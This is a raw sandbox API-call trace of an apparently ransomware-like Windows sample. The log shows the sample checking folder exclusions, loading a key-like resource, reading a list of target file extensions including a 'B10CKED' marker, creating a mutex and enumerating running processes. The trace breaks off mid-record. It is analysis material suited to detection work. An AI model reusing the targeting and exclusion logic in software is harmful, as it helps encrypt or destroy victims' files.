CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL 
SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0100.891] GetCurrentThreadId () returned 0xc44 [0100.891] GetCurrentThreadId () returned 0xc44 
[0100.892] GetCurrentThreadId () returned 0xc44 [0100.892] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0100.892] LoadResource (hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0100.892] SizeofResource (hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0100.892] LockResource (hResData=0x516f58) returned 0x516f58 [0100.892] FreeResource (hResData=0x516f58) returned 0 [0100.892] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0100.892] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0100.892] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0100.892] LockResource (hResData=0x50d64c) returned 0x50d64c [0100.892] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13850b0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0100.892] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13850b0, cbMultiByte=38, lpWideCharStr=0x137de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0100.892] FreeResource (hResData=0x50d64c) returned 0 [0100.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0100.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x13850b4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0100.892] GetCurrentThreadId () returned 0xc44 [0100.892] GetCurrentThreadId () returned 0xc44 [0100.892] GetCurrentThreadId () returned 0xc44 [0100.892] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x133ace8, 
cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0100.892] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x133ace8, cbMultiByte=97, lpWideCharStr=0x12f81ec, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 [0100.892] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0100.892] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0100.892] CharLowerBuffW (in: lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0100.892] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0100.892] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0100.892] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0100.892] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: lpsz="pek") returned 0x3 [0100.892] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0100.892] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0100.892] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0100.892] CharLowerBuffW (in: lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0100.892] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" [0100.892] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" [0100.892] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" [0100.892] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" [0100.892] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" [0100.892] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" [0100.892] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" [0100.892] OpenMutexW (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="46Brother2ProcessMutex7") returned 0x0 [0100.893] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="46Brother2ProcessMutex7") returned 0xb8 [0100.893] Sleep (dwMilliseconds=0x12c) [0101.269] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0101.269] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateToolhelp32Snapshot", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0101.269] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateToolhelp32Snapshot", cchWideChar=24, lpMultiByteStr=0x136f63c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateToolhelp32Snapshot", lpUsedDefaultChar=0x0) returned 24 
[0101.269] GetProcAddress (hModule=0x76910000, lpProcName="CreateToolhelp32Snapshot") returned 0x7694f731 [0101.269] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListFirst", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0101.269] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListFirst", cchWideChar=15, lpMultiByteStr=0x1352d0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32ListFirst", lpUsedDefaultChar=0x0) returned 15 [0101.269] GetProcAddress (hModule=0x76910000, lpProcName="Heap32ListFirst") returned 0x769a02e7 [0101.269] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListNext", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.269] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListNext", cchWideChar=14, lpMultiByteStr=0x1352d0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32ListNext", lpUsedDefaultChar=0x0) returned 14 [0101.269] GetProcAddress (hModule=0x76910000, lpProcName="Heap32ListNext") returned 0x769a0391 [0101.269] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32First", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.269] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32First", cchWideChar=11, lpMultiByteStr=0x1352d0c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32First", lpUsedDefaultChar=0x0) returned 11 [0101.269] GetProcAddress (hModule=0x76910000, lpProcName="Heap32First") returned 0x769a0429 [0101.269] WideCharToMultiByte (in: 
CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32Next", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.269] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32Next", cchWideChar=10, lpMultiByteStr=0x1352d0c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32Next", lpUsedDefaultChar=0x0) returned 10 [0101.270] GetProcAddress (hModule=0x76910000, lpProcName="Heap32Next") returned 0x769a0614 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Toolhelp32ReadProcessMemory", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Toolhelp32ReadProcessMemory", cchWideChar=27, lpMultiByteStr=0x136f63c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Toolhelp32ReadProcessMemory", lpUsedDefaultChar=0x0) returned 27 [0101.270] GetProcAddress (hModule=0x76910000, lpProcName="Toolhelp32ReadProcessMemory") returned 0x769a0819 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32First", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32First", cchWideChar=14, lpMultiByteStr=0x1352d0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32First", lpUsedDefaultChar=0x0) returned 14 [0101.270] GetProcAddress (hModule=0x76910000, lpProcName="Process32First") returned 0x7697443d [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32Next", cchWideChar=13, lpMultiByteStr=0x0, 
cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32Next", cchWideChar=13, lpMultiByteStr=0x1352d0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32Next", lpUsedDefaultChar=0x0) returned 13 [0101.270] GetProcAddress (hModule=0x76910000, lpProcName="Process32Next") returned 0x76974505 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x1352d0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32FirstW", lpUsedDefaultChar=0x0) returned 15 [0101.270] GetProcAddress (hModule=0x76910000, lpProcName="Process32FirstW") returned 0x7694fa35 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x1352d0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32NextW", lpUsedDefaultChar=0x0) returned 14 [0101.270] GetProcAddress (hModule=0x76910000, lpProcName="Process32NextW") returned 0x7694faca [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0101.270] 
WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x1352d0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32FirstW", lpUsedDefaultChar=0x0) returned 15 [0101.270] GetProcAddress (hModule=0x76910000, lpProcName="Process32FirstW") returned 0x7694fa35 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x1352d0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32NextW", lpUsedDefaultChar=0x0) returned 14 [0101.270] GetProcAddress (hModule=0x76910000, lpProcName="Process32NextW") returned 0x7694faca [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32First", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32First", cchWideChar=13, lpMultiByteStr=0x1352d0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thread32First", lpUsedDefaultChar=0x0) returned 13 [0101.270] GetProcAddress (hModule=0x76910000, lpProcName="Thread32First") returned 0x76977e4c [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32Next", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32Next", cchWideChar=12, lpMultiByteStr=0x1352d0c, cbMultiByte=12, 
lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thread32Next", lpUsedDefaultChar=0x0) returned 12 [0101.270] GetProcAddress (hModule=0x76910000, lpProcName="Thread32Next") returned 0x76977edc [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32First", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32First", cchWideChar=13, lpMultiByteStr=0x1352d0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32First", lpUsedDefaultChar=0x0) returned 13 [0101.271] GetProcAddress (hModule=0x76910000, lpProcName="Module32First") returned 0x769a0859 [0101.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32Next", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32Next", cchWideChar=12, lpMultiByteStr=0x1352d0c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32Next", lpUsedDefaultChar=0x0) returned 12 [0101.271] GetProcAddress (hModule=0x76910000, lpProcName="Module32Next") returned 0x769a0942 [0101.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x1352d0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32FirstW", lpUsedDefaultChar=0x0) returned 14 [0101.271] GetProcAddress 
(hModule=0x76910000, lpProcName="Module32FirstW") returned 0x7694c59e [0101.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x1352d0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32NextW", lpUsedDefaultChar=0x0) returned 13 [0101.271] GetProcAddress (hModule=0x76910000, lpProcName="Module32NextW") returned 0x7694c11f [0101.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x1352d0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32FirstW", lpUsedDefaultChar=0x0) returned 14 [0101.271] GetProcAddress (hModule=0x76910000, lpProcName="Module32FirstW") returned 0x7694c59e [0101.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x1352d0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32NextW", lpUsedDefaultChar=0x0) returned 13 [0101.271] GetProcAddress (hModule=0x76910000, lpProcName="Module32NextW") returned 0x7694c11f [0101.271] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 
[0101.276] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.277] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0101.277] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0101.278] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.279] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0101.279] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.280] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0101.281] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0101.281] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0101.282] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, 